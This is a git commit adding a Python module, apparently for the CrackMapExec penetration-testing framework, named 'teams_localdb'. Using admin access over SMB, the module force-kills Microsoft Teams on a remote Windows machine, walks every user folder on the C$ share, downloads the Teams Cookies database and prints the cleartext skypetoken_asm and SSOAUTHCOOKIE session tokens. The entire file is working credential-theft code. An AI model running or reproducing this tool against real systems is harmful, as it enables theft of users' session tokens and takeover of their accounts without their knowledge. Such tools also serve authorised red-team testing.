Merge remote-tracking branch 'upstream/master'

main
Zak 2022-10-18 22:29:04 +02:00
commit d55f7513d2
1 changed files with 57 additions and 0 deletions

View File

@ -0,0 +1,57 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import urllib.parse
import sqlite3
from csv import reader
from time import sleep
class CMEModule:
name = 'teams_localdb'
description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
supported_protocols = ['smb']
opsec_safe = False
multiple_hosts = False
def options(self, context, module_options):
'''
'''
def on_admin_login(self, context, connection):
context.log.info('Killing all Teams process to open the cookie file')
connection.execute("taskkill /F /T /IM teams.exe")
#sleep(3)
found = 0
paths = connection.spider('C$', folder='Users', regex=['[a-zA-Z0-9]*'], depth=0)
with open("/tmp/teams_cookies2.txt","wb") as f:
for path in paths:
try:
connection.conn.getFile('C$', path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
context.log.highlight("Found Cookie file in path " + path)
found = 1
self.parse_file(context, 'skypetoken_asm')
self.parse_file(context, 'SSOAUTHCOOKIE')
except Exception as e:
if 'STATUS_SHARING_VIOLATION' in str(e):
context.log.debug(str(e))
context.log.highlight("Found Cookie file in path " + path)
context.log.error('Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database')
if found == 0:
context.log.info('No cookie file found in Users folder')
@staticmethod
def parse_file(context, name):
try:
conn = sqlite3.connect('/tmp/teams_cookies2.txt')
c = conn.cursor()
c.execute("SELECT value FROM cookies WHERE name = '" + name + "'")
row = c.fetchone()
if row == None:
context.log.error("No " + name + " present in Microsoft Teams Cookies database")
else:
context.log.success("Succesfully extracted " + name + ": ")
context.log.success(row[0])
conn.close()
except Exception as e:
context.log.error(str(e))